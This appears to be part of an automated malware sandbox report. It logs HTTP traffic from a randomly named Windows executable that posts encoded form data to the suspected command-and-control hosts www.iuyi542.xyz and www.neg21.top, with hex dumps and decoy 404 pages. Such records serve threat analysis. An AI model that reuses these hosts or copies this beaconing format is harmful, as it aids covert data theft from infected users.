                                                                                                                            Nov 7, 2024 10:52:31.229284048 CET1236INData Raw: 5b 68 69 64 64 65 6e 5d 2c 74 65 6d 70 6c 61 74 65 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2f 2a 23 20 73 6f 75 72 63 65 4d 61 70 70 69 6e 67 55 52 4c 3d 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 2e 6d 61 70 20 2a 2f 0d 0a 09 2f 2a 21
                                                                                                                            Data Ascii: [hidden],template{display:none}/*# sourceMappingURL=normalize.min.css.map *//*! * Bootstrap v4.1.3 (https://getbootstrap.com/) * Copyright 2011-2018 The Bootstrap Authors * Copyright 2011-2018 Twitter, Inc. * Licensed under MIT (htt
                                                                                                                            Nov 7, 2024 10:52:31.229315042 CET1236INData Raw: 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 40 2d 6d 73 2d 76 69 65 77 70 6f 72 74 7b 77 69 64 74 68 3a 64 65 76 69 63 65 2d 77 69 64 74 68 7d 61 72 74 69 63 6c 65 2c 61 73 69 64 65 2c 66 69 67 63 61 70 74 69 6f 6e 2c 66 69 67 75 72 65 2c
                                                                                                                            Data Ascii: olor:transparent}@-ms-viewport{width:device-width}article,aside,figcaption,figure,footer,header,hgroup,main,nav,section{display:block}body{margin:0;font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helvetica Neue",Arial,sans-seri
                                                                                                                            Nov 7, 2024 10:52:31.229327917 CET1018INData Raw: 74 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 2d 73 6b 69 70 3a 6f 62 6a 65 63 74 73 7d 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 30 30 35 36 62 33 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72
                                                                                                                            Data Ascii: t;-webkit-text-decoration-skip:objects}a:hover{color:#0056b3;text-decoration:underline}a:not([href]):not([tabindex]){color:inherit;text-decoration:none}a:not([href]):not([tabindex]):focus,a:not([href]):not([tabindex]):hover{color:inherit;text-
                                                                                                                            Nov 7, 2024 10:52:31.229340076 CET1236INData Raw: 75 74 74 6f 6e 2c 69 6e 70 75 74 7b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 7d 62 75 74 74 6f 6e 2c 73 65 6c 65 63 74 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 7d 5b 74 79 70 65 3d 72 65 73 65 74 5d 2c 5b 74 79 70 65 3d
                                                                                                                            Data Ascii: utton,input{overflow:visible}button,select{text-transform:none}[type=reset],[type=submit],button,html [type=button]{-webkit-appearance:button}[type=button]::-moz-focus-inner,[type=reset]::-moz-focus-inner,[type=submit]::-moz-focus-inner,button
                                                                                                                            Nov 7, 2024 10:52:31.229355097 CET1236INData Raw: 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 3b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 7d 2e 68 31
                                                                                                                            Data Ascii: bottom:.5rem;font-family:inherit;font-weight:500;line-height:1.2;color:inherit}.h1,h1{font-size:2.5rem}.h2,h2{font-size:2rem}.h3,h3{font-size:1.75rem}.h4,h4{font-size:1.5rem}.h5,h5{font-size:1.25rem}.h6,h6{font-size:1rem}.lead{font-size:1.25re
                                                                                                                            Nov 7, 2024 10:52:31.229371071 CET1236INData Raw: 65 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 2e 66 69 67 75 72 65 2d 69 6d 67 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 7d 2e 66 69 67 75 72 65 2d 63 61 70 74 69
                                                                                                                            Data Ascii: e{display:inline-block}.figure-img{margin-bottom:.5rem;line-height:1}.figure-caption{font-size:90%;color:#6c757d}code{font-size:87.5%;color:#e83e8c;word-break:break-word}a>code{color:inherit}kbd{padding:.2rem .4rem;font-size:87.5%;color:#fff;b
                                                                                                                            Nov 7, 2024 10:52:31.229859114 CET1236INData Raw: 2e 63 6f 6c 2d 6c 67 2d 31 2c 2e 63 6f 6c 2d 6c 67 2d 31 30 2c 2e 63 6f 6c 2d 6c 67 2d 31 31 2c 2e 63 6f 6c 2d 6c 67 2d 31 32 2c 2e 63 6f 6c 2d 6c 67 2d 32 2c 2e 63 6f 6c 2d 6c 67 2d 33 2c 2e 63 6f 6c 2d 6c 67 2d 34 2c 2e 63 6f 6c 2d 6c 67 2d 35
                                                                                                                            Data Ascii: .col-lg-1,.col-lg-10,.col-lg-11,.col-lg-12,.col-lg-2,.col-lg-3,.col-lg-4,.col-lg-5,.col-lg-6,.col-lg-7,.col-lg-8,.col-lg-9,.col-lg-auto,.col-md,.col-md-1,.col-md-10,.col-md-11,.col-md-12,.col-md-2,.col-md-3,.col-md-4,.col-md-5,.col-md-6,.col-m
                                                                                                                            Nov 7, 2024 10:52:31.229872942 CET848INData Raw: 38 2e 33 33 33 33 33 33 25 3b 6d 61 78 2d 77 69 64 74 68 3a 35 38 2e 33 33 33 33 33 33 25 7d 2e 63 6f 6c 2d 38 7b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 36 36 2e 36 36 36 36 36 37 25 3b 66 6c 65 78 3a 30 20 30 20 36 36 2e 36 36 36 36 36 37 25 3b
                                                                                                                            Data Ascii: 8.333333%;max-width:58.333333%}.col-8{-ms-flex:0 0 66.666667%;flex:0 0 66.666667%;max-width:66.666667%}.col-9{-ms-flex:0 0 75%;flex:0 0 75%;max-width:75%}.col-10{-ms-flex:0 0 83.333333%;flex:0 0 83.333333%;max-width:83.333333%}.col-11{-ms-flex
                                                                                                                            Nov 7, 2024 10:52:31.259902000 CET1236INData Raw: 2e 6f 72 64 65 72 2d 31 32 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 31 32 3b 6f 72 64 65 72 3a 31 32 7d 2e 6f 66 66 73 65 74 2d 31 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 38 2e 33 33 33 33 33 33 25 7d 2e 6f 66 66 73 65 74 2d 32 7b 6d 61 72
                                                                                                                            Data Ascii: .order-12{-ms-flex-order:12;order:12}.offset-1{margin-left:8.333333%}.offset-2{margin-left:16.666667%}.offset-3{margin-left:25%}.offset-4{margin-left:33.333333%}.offset-5{margin-left:41.666667%}.offset-6{margin-left:50%}.offset-7{margin-left:5


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            40192.168.2.224920138.47.237.2780652C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 7, 2024 10:52:33.123246908 CET2472OUTPOST /cymd/ HTTP/1.1
                                                                                                                            Host: www.iuyi542.xyz
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.iuyi542.xyz
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 3627
                                                                                                                            Referer: http://www.iuyi542.xyz/cymd/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                                            Data Raw: 6d 46 70 74 59 62 3d 66 53 35 35 43 43 33 45 68 38 76 66 36 78 2f 78 6a 79 61 37 50 42 76 69 58 42 56 54 78 57 51 67 54 46 34 44 66 77 30 72 45 73 62 74 65 72 50 70 4c 33 66 45 4a 59 43 74 52 67 67 42 30 67 70 54 54 5a 46 75 38 6b 64 49 4b 31 6d 4e 44 56 73 7a 51 62 55 65 33 6b 79 6b 54 50 51 43 63 4e 73 4d 47 52 77 73 55 6c 44 66 72 57 34 68 41 6d 37 79 55 7a 62 43 6b 33 44 39 52 4f 4d 73 45 45 5a 49 39 6e 65 30 33 55 30 30 45 68 33 59 45 67 69 4f 46 45 57 57 32 7a 32 6c 70 45 6a 61 38 6b 31 48 55 66 4c 63 55 4a 73 44 50 36 62 32 71 55 6e 61 53 48 42 44 4e 78 4b 49 6a 6c 2b 39 69 72 69 38 35 50 30 47 72 39 54 75 4a 53 6a 42 43 65 54 39 51 34 65 4e 4b 49 49 64 4a 54 73 41 77 34 67 43 68 7a 57 44 6b 37 46 50 71 2f 68 4d 2f 65 70 30 51 37 49 35 4c 33 38 49 77 45 37 30 43 58 75 38 65 45 55 4f 4f 57 51 6e 32 41 33 70 66 41 65 46 33 79 67 73 74 55 2b 2b 79 77 49 48 39 30 36 78 7a 36 42 32 51 77 5a 76 4c 4c 46 77 73 66 4f 34 4e 6d 38 49 73 75 48 67 65 4b 30 73 43 61 42 51 4d 4d 35 6a 64 76 78 75 48 77 6b [TRUNCATED]
                                                                                                                            Data Ascii: mFptYb=fS55CC3Eh8vf6x/xjya7PBviXBVTxWQgTF4Dfw0rEsbterPpL3fEJYCtRggB0gpTTZFu8kdIK1mNDVszQbUe3kykTPQCcNsMGRwsUlDfrW4hAm7yUzbCk3D9ROMsEEZI9ne03U00Eh3YEgiOFEWW2z2lpEja8k1HUfLcUJsDP6b2qUnaSHBDNxKIjl+9iri85P0Gr9TuJSjBCeT9Q4eNKIIdJTsAw4gChzWDk7FPq/hM/ep0Q7I5L38IwE70CXu8eEUOOWQn2A3pfAeF3ygstU++ywIH906xz6B2QwZvLLFwsfO4Nm8IsuHgeK0sCaBQMM5jdvxuHwkvsAKbV49qdQu2VMj50w0V/dziSWtUaDSTwEID0g/wUBWDA/leUzU5jH/l0gKxfqElR7tmS33fmjl+sH5sSh/ODVTib9SlX1fc9rDyrE8DUrRRuVcvjcQ3PslUHJETH9vBgsq/o7+R6WUN1hkg2MkNYV7bJdxclDXsHdenLeJfedPM5P5/L6b6X35pfI8qeZUBatSOZpc2+BVh230lR4wisStyzUipEc/EgN85dG0xQDk+tywPiPq9NFdNvZP864YyD2UDZMohJg7hhvCBE0qtPY0vDSfULALXj6/osGPKiVq6jNQ81swa13KncijndN0NwRpFFEgPolrYZhfvNh8ZreUFOZ6inrRJn3oqqy181HyngLEv4MhN/uNPkJ4mVrwBCBEoBqqUTF5cXth+r3d4O7DgxVDoFjTHfwnw/DTPAII/2rvGBHtQstxXtn1k3/qTF7k6gydHgg+vTZaImNzAWXW0S4OqsX+wUM+74SYqMpcHn10kKtaUEuevDLJQ7zjG+pIjENt2ESlO9pgL5SRlW60XkTObzkW4XaUj/sgCXqF1px+zZpOdkMzUVyMBi12F5FAcy+9B7ya5xwwWe7D3jOT7LGDmef5sWbxUJxnwYICUfYeMZVMz1V9b5zEHg7YEJIq7toWg5dbCNXAenNEBZ3avAus6DZLfh [TRUNCATED]
                                                                                                                            Nov 7, 2024 10:52:33.128182888 CET1740OUTData Raw: 6d 2f 42 54 34 65 6e 55 68 59 6b 31 32 41 35 79 37 6f 49 6b 32 48 2b 6c 64 55 4a 6a 37 39 35 65 69 39 31 73 38 54 38 2b 39 52 5a 43 30 50 53 72 4e 51 35 68 74 38 63 4a 46 30 68 51 48 43 47 68 47 68 6c 31 42 6a 70 6c 2f 66 71 4a 6d 76 49 54 4c 45
                                                                                                                            Data Ascii: m/BT4enUhYk12A5y7oIk2H+ldUJj795ei91s8T8+9RZC0PSrNQ5ht8cJF0hQHCGhGhl1Bjpl/fqJmvITLEVFC96M/583tgDig5+f5b6IcCZXac4XvtTh058FgmUv9cabtNRBvZFWxgwe1fcxy3wHHOF9P07oOMwINtX86nhS7Uff1NekQc5su7EGEpZnU8A1ZrJDM+4kSc0MRJAuoQjxOoZPRD2b7aHCm8FRPkxXMavISr4PxU3
                                                                                                                            Nov 7, 2024 10:52:33.780874014 CET170INHTTP/1.1 404 Not Found
                                                                                                                            Server: nginx
                                                                                                                            Date: Thu, 07 Nov 2024 09:52:33 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 167433
                                                                                                                            Connection: close
                                                                                                                            ETag: "652641ca-28e09"
                                                                                                                            Nov 7, 2024 10:52:33.780972958 CET1236INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 20 50 61 67 65 3c
                                                                                                                            Data Ascii: <html lang="en"><head> <meta charset="UTF-8"> <title>CodePen - 404 Page</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style>button,hr,input{overflow:visible}audio,canvas,progress,video{dis
                                                                                                                            Nov 7, 2024 10:52:33.781124115 CET212INData Raw: 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 35 3b 6d 61 72 67 69 6e 3a 30 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 7b 7d 62 75 74 74 6f 6e 2c 73 65 6c 65 63 74 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 7d 5b 74 79 70 65 3d 73 75 62 6d
                                                                                                                            Data Ascii: ne-height:1.15;margin:0}button,input{}button,select{text-transform:none}[type=submit], [type=reset],button,html [type=button]{-webkit-appearance:button}[type=button]::-moz-focus-inner,[type=reset]::-moz-focus-inn
                                                                                                                            Nov 7, 2024 10:52:33.781136036 CET1236INData Raw: 65 72 2c 5b 74 79 70 65 3d 73 75 62 6d 69 74 5d 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 2c 62 75 74 74 6f 6e 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 7b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 6e 6f 6e 65 3b 70 61 64 64
                                                                                                                            Data Ascii: er,[type=submit]::-moz-focus-inner,button::-moz-focus-inner{border-style:none;padding:0}[type=button]:-moz-focusring,[type=reset]:-moz-focusring,[type=submit]:-moz-focusring,button:-moz-focusring{outline:ButtonText dotted 1px}fieldset{border:1
                                                                                                                            Nov 7, 2024 10:52:33.781203985 CET212INData Raw: 3b 2d 2d 6f 72 61 6e 67 65 3a 23 66 64 37 65 31 34 3b 2d 2d 79 65 6c 6c 6f 77 3a 23 66 66 63 31 30 37 3b 2d 2d 67 72 65 65 6e 3a 23 32 38 61 37 34 35 3b 2d 2d 74 65 61 6c 3a 23 32 30 63 39 39 37 3b 2d 2d 63 79 61 6e 3a 23 31 37 61 32 62 38 3b 2d
                                                                                                                            Data Ascii: ;--orange:#fd7e14;--yellow:#ffc107;--green:#28a745;--teal:#20c997;--cyan:#17a2b8;--white:#fff;--gray:#6c757d;--gray-dark:#343a40;--primary:#007bff;--secondary:#6c757d;--success:#28a745;--info:#17a2b8;--warning:#f
                                                                                                                            Nov 7, 2024 10:52:33.781270027 CET1236INData Raw: 66 63 31 30 37 3b 2d 2d 64 61 6e 67 65 72 3a 23 64 63 33 35 34 35 3b 2d 2d 6c 69 67 68 74 3a 23 66 38 66 39 66 61 3b 2d 2d 64 61 72 6b 3a 23 33 34 33 61 34 30 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 78 73 3a 30 3b 2d 2d 62 72 65 61 6b 70 6f 69
                                                                                                                            Data Ascii: fc107;--danger:#dc3545;--light:#f8f9fa;--dark:#343a40;--breakpoint-xs:0;--breakpoint-sm:576px;--breakpoint-md:768px;--breakpoint-lg:992px;--breakpoint-xl:1200px;--font-family-sans-serif:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helve
                                                                                                                            Nov 7, 2024 10:52:33.781280994 CET212INData Raw: 65 6d 7d 61 62 62 72 5b 64 61 74 61 2d 6f 72 69 67 69 6e 61 6c 2d 74 69 74 6c 65 5d 2c 61 62 62 72 5b 74 69 74 6c 65 5d 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 64 65
                                                                                                                            Data Ascii: em}abbr[data-original-title],abbr[title]{text-decoration:underline;-webkit-text-decoration:underline dotted;text-decoration:underline dotted;cursor:help;border-bottom:0}address{margin-bottom:1rem;font-style:norma
                                                                                                                            Nov 7, 2024 10:52:33.781403065 CET1236INData Raw: 6c 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 64 6c 2c 6f 6c 2c 75 6c 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 6f 6c 20 6f 6c 2c 6f 6c 20 75 6c 2c 75 6c 20 6f 6c 2c 75
                                                                                                                            Data Ascii: l;line-height:inherit}dl,ol,ul{margin-top:0;margin-bottom:1rem}ol ol,ol ul,ul ol,ul ul{margin-bottom:0}dt{font-weight:700}dd{margin-bottom:.5rem;margin-left:0}blockquote{margin:0 0 1rem}dfn{font-style:italic}b,strong{font-weight:bolder}small{f
                                                                                                                            Nov 7, 2024 10:52:33.781414986 CET212INData Raw: 6f 6d 3a 2e 35 72 65 6d 7d 62 75 74 74 6f 6e 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 7d 62 75 74 74 6f 6e 3a 66 6f 63 75 73 7b 6f 75 74 6c 69 6e 65 3a 31 70 78 20 64 6f 74 74 65 64 3b 6f 75 74 6c 69 6e 65 3a 35 70 78 20 61 75 74 6f 20 2d
                                                                                                                            Data Ascii: om:.5rem}button{border-radius:0}button:focus{outline:1px dotted;outline:5px auto -webkit-focus-ring-color}button,input,optgroup,select,textarea{margin:0;font-family:inherit;font-size:inherit;line-height:inherit}b
                                                                                                                            Nov 7, 2024 10:52:33.781562090 CET1236INData Raw: 75 74 74 6f 6e 2c 69 6e 70 75 74 7b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 7d 62 75 74 74 6f 6e 2c 73 65 6c 65 63 74 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 7d 5b 74 79 70 65 3d 72 65 73 65 74 5d 2c 5b 74 79 70 65 3d
                                                                                                                            Data Ascii: utton,input{overflow:visible}button,select{text-transform:none}[type=reset],[type=submit],button,html [type=button]{-webkit-appearance:button}[type=button]::-moz-focus-inner,[type=reset]::-moz-focus-inner,[type=submit]::-moz-focus-inner,button


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            41192.168.2.224920238.47.237.2780652C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 7, 2024 10:52:35.765975952 CET529OUTGET /cymd/?mFptYb=SQRZB1HP1/e+i1vXkx65XVrDeSNNnXwFTHYuRC8KH5mDKLD+AhmaLKzef3QT7SVce+tzzUZ1GVC2U2YQK5wN3xroRLUyaPMbLSFxR1aJqBACZHGGUwWsqj7Ua713&Vta=nFypuDtholF HTTP/1.1
                                                                                                                            Host: www.iuyi542.xyz
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            42192.168.2.2249203206.119.81.3680652C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 7, 2024 10:52:41.094434023 CET2472OUTPOST /1i1f/ HTTP/1.1
                                                                                                                            Host: www.neg21.top
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.neg21.top
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 2163
                                                                                                                            Referer: http://www.neg21.top/1i1f/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                                            Data Raw: 6d 46 70 74 59 62 3d 51 53 77 36 67 52 37 30 45 69 77 31 77 45 58 62 61 69 4e 4d 64 30 58 33 36 58 48 57 69 76 79 70 34 69 2f 66 32 51 36 43 38 33 59 61 63 76 51 4d 32 63 2f 30 39 46 50 7a 41 6c 4a 36 59 65 63 31 56 4c 76 32 4c 38 2b 46 32 4d 67 47 30 6a 30 6b 31 4c 72 31 43 54 53 49 53 78 5a 35 78 47 6e 45 5a 74 7a 73 58 76 41 43 56 78 47 36 50 6c 4c 59 53 33 41 6a 70 79 42 32 71 5a 4b 56 52 7a 47 34 48 55 69 73 54 58 6d 49 70 57 71 66 67 4b 51 32 49 48 53 68 61 4d 6b 68 77 34 2f 57 30 6b 72 2b 36 78 4a 6e 6e 62 6a 59 36 5a 70 6b 72 53 34 53 55 2b 6d 42 36 34 2b 63 6d 73 72 4e 69 47 51 57 4b 34 2f 74 65 6c 72 51 61 41 67 51 59 6c 43 74 78 47 6a 63 6d 44 49 43 62 64 78 6a 2f 46 39 36 41 66 62 72 5a 78 61 79 6a 76 4e 30 66 53 31 48 6f 48 43 7a 79 51 5a 44 33 71 63 6a 43 69 6b 6c 54 33 49 4b 42 71 77 4e 4a 4a 42 69 52 68 53 69 48 44 69 6c 55 4e 62 2f 38 65 71 38 46 4e 77 6e 62 68 51 4e 70 52 70 64 54 71 66 54 33 31 56 68 56 43 39 79 56 62 4b 30 6a 30 39 52 43 58 57 41 37 4f 6a 43 78 53 59 42 78 69 36 [TRUNCATED]
                                                                                                                            Data Ascii: mFptYb=QSw6gR70Eiw1wEXbaiNMd0X36XHWivyp4i/f2Q6C83YacvQM2c/09FPzAlJ6Yec1VLv2L8+F2MgG0j0k1Lr1CTSISxZ5xGnEZtzsXvACVxG6PlLYS3AjpyB2qZKVRzG4HUisTXmIpWqfgKQ2IHShaMkhw4/W0kr+6xJnnbjY6ZpkrS4SU+mB64+cmsrNiGQWK4/telrQaAgQYlCtxGjcmDICbdxj/F96AfbrZxayjvN0fS1HoHCzyQZD3qcjCiklT3IKBqwNJJBiRhSiHDilUNb/8eq8FNwnbhQNpRpdTqfT31VhVC9yVbK0j09RCXWA7OjCxSYBxi6Lgg08J4UQbKvTxzpm9dVgbwvIKbsjgy3Hui9YV84TmkXry6En6QHY7zCv3CRBrbo4TMjS1AV58TQ0bZSrl+/OHipT6LRKX4/BOnyx5ILp3sjhmBIjsLrpPCnBuNQfA3HW62zhhEKvl4RWEPTpylGmwWR0zyKv+7u4nbwCTK0dvwt1ilpLoRMrAZTcgkC7Y06Cj0vzQDzOFsE38cLAvtowDJWNk3SocaTVxb8Gsr8A3Mdb8Rd9wmY83wa2VHR9hnSpe6QPUroVjEblZb79yvme3zBoJMvdTiMUytkvbnSyDqMuckDUqV8h4p3VWe2iQU0l8cZ654zHTgbecmZ+xqi5pn5fHBGJ/fOay394RM9bRn1aWYAPVwFqtKxqRff/XgzHXvBkdXswhLVdSdpGdQvdCicJ3MhBbnRqXFvxiq2CxonB/BvWVpWpfgvA/X73OYGIXNxyUJjw4BvcHUSTCI1IyCsjvr3zf1Za86mWN2KcZY1oTxCoDS68t1SJA39cfNeZLWRJN+DMvYyRGFwGybFbRg8Wlfoxu3OkUkAoX1ixqtTcTq9TRrCimV9Qicehzcjze8V2TbQG3vUhGt1K1sonsEXILF0q5y6mSxIRxW3UbcNPV3QvuLlOx+rdfD+D/TNB8A18QxYZT6pPBLThi5lNeIEiI1H6cnDrJ [TRUNCATED]
                                                                                                                            Nov 7, 2024 10:52:41.099757910 CET270OUTData Raw: 4a 44 67 36 6c 53 43 38 34 34 52 6a 37 32 74 53 49 62 57 62 79 31 48 6d 34 61 4e 30 43 50 4f 52 36 52 68 79 47 76 44 52 4c 33 7a 4e 35 4b 73 55 58 52 52 69 49 38 38 6e 52 68 59 6d 44 67 7a 45 54 2f 62 6e 2b 63 41 6b 4c 34 30 66 47 64 70 59 4d 2b
                                                                                                                            Data Ascii: JDg6lSC844Rj72tSIbWby1Hm4aN0CPOR6RhyGvDRL3zN5KsUXRRiI88nRhYmDgzET/bn+cAkL40fGdpYM+dtZORGKbBqHmDrBCzVX826631/DfD9dnPMY0tCYvQLPWvBXnR6ZIFBFYU714ke9eFjQcZQeifiwiJndeTB/cqt2VreTcj6zFvHJoHs2s/G+lANptvAnKAWdmu4fIVS+8oLfwKmvv0rJkI8TYxU27olJ5vhUw3bNg1
                                                                                                                            Nov 7, 2024 10:52:42.059843063 CET691INHTTP/1.1 404 Not Found
                                                                                                                            Server: nginx
                                                                                                                            Date: Thu, 07 Nov 2024 09:52:41 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 548
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            43192.168.2.2249204206.119.81.3680652C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 7, 2024 10:52:43.637758970 CET781OUTPOST /1i1f/ HTTP/1.1
                                                                                                                            Host: www.neg21.top
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.neg21.top
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 203
                                                                                                                            Referer: http://www.neg21.top/1i1f/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
